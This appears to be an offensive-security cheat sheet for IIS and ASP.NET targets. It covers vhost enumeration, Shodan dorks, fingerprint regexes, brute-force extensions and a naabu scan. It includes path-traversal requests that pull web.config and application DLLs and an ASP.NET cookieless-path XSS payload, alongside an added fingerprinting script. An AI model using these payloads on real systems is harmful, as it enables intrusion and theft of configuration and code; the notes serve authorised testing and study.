
Hacking IIS Applications

Resources

https://youtu.be/XlmeSFm3RT4?si=hfhzGF9ymG6Igt5j

https://www.youtube.com/watch?v=cqM-MdPkaWo

https://www.youtube.com/watch?v=yyD8Z5Qar5I

https://www.youtube.com/watch?v=_4W0WXUatiw

HTTPAPI 2.0 Assets

  • The asset answers with an HTTPAPI 2.0 404 error

  • It is a bare IP, but you can get the subdomain from the certificate common name

  • Edit the Host header to use that subdomain

VHost Hopping

  • Came across a subdomain running an IIS server: apply.company.com

  • VHost enumeration using ffuf or Burp Intruder

  • Found mssql.company.com

  • Running MSSQL Explorer/Manager

Local File Disclosure to DLLs

  • DownloadCategoryExcel?fileName=../../web.config

  • DownloadCategoryExcel?fileName=../../global.asax

  • <add namespace="Company.Web.Api" /> (the namespace gives the name of the assembly under bin/)

  • DownloadCategoryExcel?fileName=../../bin/Company.Web.Api.dll

LFD -> RCE

RCE with Local

ASP.NET XSS

  • Try in login pages, redirects, forms & dynamic URL construction (~/images/). Payload: /(A(%22onerror='alert%60123%60'test))/

dnSpy

IIS Discovery Bruteforce

Partial Fuzzing

Nuclei

Check out the Nuclei templates for fuzzing techniques.

Fingerprinting with Shodan

Utilize Shodan to identify IIS instances with specific characteristics:

  • http.title:"IIS"

  • ssl:"Company Inc." http.title:"IIS"

  • ssl.cert.subject.CN:"company.in" http.title:"IIS"

Fingerprinting Techniques

Cookies

  • ASP.NET_SessionId

  • ASPSESSION

Headers Regex

  • X-AspNet-Version: (.*)\;version:\1

  • X-Powered-By: ^ASP\.NET

HTML Regex

  • <input[^>]+name="__VIEWSTATE

URL Regex

  • \.aspx?(?:$|\?)
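
The cookie, header, HTML and URL signatures listed above, combined into one check that can be run over responses from your own hosts to see which ones still expose these markers. This is an added example, not code from the original notes; the function name, the signal labels and the sample response are assumptions made for illustration.

```python
import re

# Signatures from the lists above, written as plain Python regexes.
COOKIE_RE = re.compile(r"^(ASP\.NET_SessionId|ASPSESSION)", re.I)
POWERED_RE = re.compile(r"^ASP\.NET", re.I)
VIEWSTATE_RE = re.compile(r'<input[^>]+name="__VIEWSTATE', re.I)
URL_RE = re.compile(r"\.aspx?(?:$|\?)", re.I)


def fingerprint(url, headers, body):
    """Return (signals, version) for one HTTP response.

    headers is a list of (name, value) pairs so that repeated
    Set-Cookie headers are preserved; names match case-insensitively.
    """
    signals, version = [], None
    for name, value in headers:
        lname, value = name.lower(), value.strip()
        if lname == "x-aspnet-version" and value:
            version = value  # the whole header value is the version
            signals.append("header:X-AspNet-Version")
        elif lname == "x-powered-by" and POWERED_RE.search(value):
            signals.append("header:X-Powered-By")
        elif lname == "set-cookie":
            cookie_name = value.split("=", 1)[0].strip()
            if COOKIE_RE.match(cookie_name):
                signals.append("cookie:" + cookie_name)
    if VIEWSTATE_RE.search(body):
        signals.append("html:__VIEWSTATE")
    if URL_RE.search(url):
        signals.append("url:.asp/.aspx")
    return signals, version


# Constructed sample response (not captured from a real host).
SAMPLE_URL = "https://apply.company.com/Login.aspx?ReturnUrl=%2f"
SAMPLE_HEADERS = [
    ("Server", "Microsoft-IIS/10.0"),
    ("X-AspNet-Version", "4.0.30319"),
    ("X-Powered-By", "ASP.NET"),
    ("Set-Cookie", "ASP.NET_SessionId=abc123; path=/; HttpOnly"),
]
SAMPLE_BODY = '<form><input type="hidden" name="__VIEWSTATE" value="x" /></form>'

if __name__ == "__main__":
    print(fingerprint(SAMPLE_URL, SAMPLE_HEADERS, SAMPLE_BODY))
```
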

Ignoring Directories from Scanning

Exclude these directories from your scans:

  • ASPNET~1

  • DEFAULT~1.ASP

  • DEFAULT~1.CSS

  • GLOBAL.ASA

  • GLOBAL.ASP

  • GLOBAL.CS

  • MASTER.CS

  • WEB.CON

Extensions to Bruteforce

Bruteforce file extensions to uncover vulnerabilities:

  • .asp (Legacy Active Server Pages)

  • .aspx (Modern Active Server Pages)

  • .ashx (APIs/AJAX)

  • .wsdl (Web Services Description Language)

  • .wadl (Web Application Description Language)

  • .asmx (XML Web Services)

  • .xml

  • .zip

  • .txt

Port Scanning

  • naabu -host iis.target.com
